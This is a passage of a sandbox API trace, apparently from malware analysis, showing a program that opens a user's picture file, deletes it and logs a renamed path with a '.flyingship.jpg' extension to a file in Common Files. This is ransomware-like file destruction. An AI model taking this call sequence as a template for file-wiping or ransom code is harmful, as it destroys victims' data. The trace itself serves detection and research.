returned 0x8 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.390] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.390] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.390] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0xe7155b40, ftLastWriteTime.dwHighDateTime=0x1d5e5dc, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0x90af58 [0191.390] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.390] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.391] CharLowerBuffW (in: lpsz="byte[66500]", cchLength=0xb | out: lpsz="byte[66500]") returned 0xb [0191.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.391] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.391] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.391] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.391] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.392] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.393] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.406] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.406] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\onhysixg5vz 1mhk2taa.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0191.406] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.406] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.406] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.406] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.406] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.407] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.407] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.407] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.407] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.407] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.407] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.408] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.408] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.408] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.408] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFilePart=0x0) returned 0x3f [0191.408] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0x1749d720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0x90af58 [0191.408] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\onhysixg5vz 1mhk2taa.jpg")) returned 1 [0191.415] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23400e00, ftCreationTime.dwHighDateTime=0x1d5e310, ftLastAccessTime.dwLowDateTime=0xe7155b40, ftLastAccessTime.dwHighDateTime=0x1d5e5dc, ftLastWriteTime.dwLowDateTime=0x1749d720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x103c4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="oNhYsixG5vZ 1mhk2TaA.jpg", cAlternateFileName="ONHYSI~1.JPG")) returned 0 [0191.415] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.418] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.419] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.419] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.420] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.420] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.420] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0191.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.420] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.428] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.428] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.428] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.428] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.428] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.428] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x31e4, lpOverlapped=0x0) returned 1 [0191.429] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x31e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.429] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0191.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d) returned 0x9238c0 [0191.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\n", cchWideChar=77, lpMultiByteStr=0x9238c0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 77 [0191.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0191.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.429] WriteFile (in: hFile=0x158, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4c, lpOverlapped=0x0) returned 1 [0191.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0191.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.430] CloseHandle (hObject=0x158) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.436] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 